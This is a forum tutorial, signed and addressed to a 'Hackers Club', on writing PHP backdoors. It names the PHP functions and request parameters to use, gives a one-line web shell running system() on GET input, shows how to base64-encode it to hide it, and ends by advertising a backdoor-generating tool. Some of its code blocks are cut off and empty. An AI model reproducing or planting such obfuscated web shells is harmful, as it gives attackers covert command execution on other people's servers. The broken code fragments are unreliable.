Dear members and guests of Hackers Club,

This is a small tutorial to how One could make backdoors in PHP.
The reason why a backdoor may be needed could be if your site
gets hacked but if there's no protection on the backdoor and if
a hacker finds that backdoor then your site may get hacked that
way too, so be careful with these examples.

First we need to know which functions we can use:
- System(); // Executes an external program.
- Exec(); // Executes an external program.
- Fopen(); // Opens a file on the system.
- Include(); // Includes a file to be executed.
- Eval(); // Executes PHP code.

With that in mind, we move over to how the backdoor can receive input:
- $_GET['var']; // Receives input like: file.php?var=command
- $_POST['var']; // Receives input via the POST-parameter. (LiveHTTPHeaders can be used).
- $_COOKIE['var']; // Receives input via browser-cookies.

Now we might want to encode the backdoor, a few ways are:
- Base64 encoding (base64_encode() is a builtin function).
- Encode it like shellcode: "\xDE\xAD\xBE\xEF";
- And possibly many more ways!

So lets say you want to create a backdoor which uses:
- system() + $_GET[] + base64_encode()

Before encoding anything we write the code that we want to be executed:
PHP Code:
($_GET['s3cr3t']); ?>
That's how simple it will look if it wasn't encoded.

In order to encode it we can either use an application or do it ourselves:
$var = "system(\$_GET['s3cr3t']);"; // $ needs to be escaped.
echo base64_encode($var);

Which results in: c3lzdGVtKCRfR0VUWydzM2NyM3QnXSk7

In order to execute it we need the following PHP code:
PHP Code:
Which will work fine if we supply a GET-request to the file it is
included in all the time. Otherwise it will send an error to the site
because system() can't handle empty requests.

In order to bypass this issue we could use: error_reporting(0); in
our script. But that results in a lot more code! So why not use some-
thing easier such as @ before the command?

This should supress all warnings, from system() only of course.

Without encoding the backdoor the code would look like:
PHP Code:
@system($_GET['server']); ?>
Pretty simple? I think so too and I'm glad that I haven't seen
that many problems with PHP backdoors yet since it would be
a pain to check anything you might want to use, for backdoors.

Our backdoor is at this stage very simple but also very small.

One of the first things to implement after using system() or exec()
would be sending the output to
tags so the output is
easy to read which is a good idea when using PHP backdoors.

The other commands we can use, fopen() and include() in short
may be used for LFI and perhaps RFI (depending on php.ini settings).

Eval() can be used to execute PHP code directly which would probably
be one of the most effective backdoors if the hacker, knows PHP of course!

That's basicly it of what you could or should know about PHP backdoors at the moment.

I've recently had some more cool ideas (which are hard to implement, yet more stealthy).
I will write about them as soon as I am done with my other projects (I have many at the
moment and there is a lot of testing with my new ideas).

Meanwhile I also created a better application in PHP for creating and encoding backdoors!

Application Link: HaXxd00r

Best regards,
Sumit Shukla